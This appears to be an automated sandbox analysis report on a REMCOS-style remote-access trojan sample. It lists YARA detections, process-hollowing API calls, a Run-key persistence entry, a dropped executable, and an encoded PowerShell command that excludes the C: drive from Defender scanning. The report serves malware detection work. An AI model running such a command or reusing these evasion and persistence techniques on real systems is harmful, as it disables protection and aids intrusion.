Source: 0000001C.00000000.603526142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000011.00000000.534848870.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 00000011.00000000.534848870.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001C.00000000.599641579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001C.00000000.599641579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001C.00000000.599125899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001C.00000000.599125899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000018.00000002.613026227.0000000005440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0000001A.00000000.593157225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001A.00000000.593157225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001C.00000000.606295959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000001C.00000000.606295959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: String function: 004310BE appears 38 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: String function: 00402053 appears 50 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: String function: 00431740 appears 53 times

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_00414EA8 CreateProcessW,CloseHandle,CloseHandle,CloseHandle,CloseHandle,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,TerminateProcess,SetThreadContext,ResumeThread,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,

17_2_00414EA8

Source: kyFBQxVbsg.exe, 00000000.00000002.540743790.0000000003687000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWoctlxtjcvxsj.dll" vs kyFBQxVbsg.exe
Source: kyFBQxVbsg.exe, 00000000.00000003.526374372.0000000003850000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWoctlxtjcvxsj.dll" vs kyFBQxVbsg.exe
Source: kyFBQxVbsg.exe, 00000000.00000000.371796335.0000000000392000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamerc.exe4 vs kyFBQxVbsg.exe
Source: kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs kyFBQxVbsg.exe
Source: kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs kyFBQxVbsg.exe
Source: kyFBQxVbsg.exe	Binary or memory string: OriginalFilenamerc.exe4 vs kyFBQxVbsg.exe

Source: kyFBQxVbsg.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Qerdo.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: kyFBQxVbsg.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe

File created: C:\Users\user\AppData\Roaming\Ppjollp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@18/10@117/1

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_004172C8 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

17_2_004172C8

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_00417CBB FindResourceA,LoadResource,LockResource,SizeofResource,

17_2_00417CBB

Source: kyFBQxVbsg.exe	Virustotal: Detection: 46%
Source: kyFBQxVbsg.exe	ReversingLabs: Detection: 57%

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe

File read: C:\Users\user\Desktop\kyFBQxVbsg.exe

Jump to behavior

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\kyFBQxVbsg.exe "C:\Users\user\Desktop\kyFBQxVbsg.exe"
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAIABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJwBDADoAXAAnAA==
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe "C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe "C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe"
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAIABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJwBDADoAXAAnAA==	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_00414706 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,

17_2_00414706

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_esjq1xkt.ffx.ps1

Jump to behavior

Source: kyFBQxVbsg.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_0040D3C8 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,

17_2_0040D3C8

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6424:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Mutant created: \Sessions\1\BaseNamedObjects\cvxyttydfsgbghfgfhtd-RXTSAM

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: kyFBQxVbsg.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: kyFBQxVbsg.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: protobuf-net.pdbSHA256 source: kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Yara detected Costura Assembly Loader

Source: Yara match	File source: 24.2.Qerdo.exe.5440000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.Qerdo.exe.48f0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.Qerdo.exe.48f0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.kyFBQxVbsg.exe.4ba0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.kyFBQxVbsg.exe.4ba0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.Qerdo.exe.5440000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.526374372.0000000003850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.597952189.000000000239C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.606363285.00000000048F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.540068634.000000000269C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.541870137.0000000004BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.587908821.0000000004060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.581326592.0000000003550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.610776047.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.613026227.0000000005440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: kyFBQxVbsg.exe PID: 6232, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Qerdo.exe PID: 6216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Qerdo.exe PID: 5652, type: MEMORYSTR

.NET source code contains potential unpacker

Source: kyFBQxVbsg.exe, hlrc.cs	.Net Code: qmvy System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 19.2.Qerdo.exe.40000.0.unpack, hlrc.cs	.Net Code: qmvy System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Code function: 0_2_024A2827 push ebx; ret	0_2_024A287A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00C8FF5F push es; ret	3_2_00C8FF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_004594FD push esi; ret	17_2_00459506
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00431786 push ecx; ret	17_2_00431799
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00453798 push eax; ret	17_2_004537B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00452E76 push ecx; ret	17_2_00452E89

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_0040CE58 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,

17_2_0040CE58

Source: initial sample	Static PE information: section name: .text entropy: 7.9984009418791
Source: initial sample	Static PE information: section name: .text entropy: 7.9984009418791

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe

File created: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_00405CE1 ShellExecuteW,URLDownloadToFileW,

17_2_00405CE1

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Qerdo			Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Qerdo			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_004172C8 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

17_2_004172C8

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

17_2_0040CE58

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
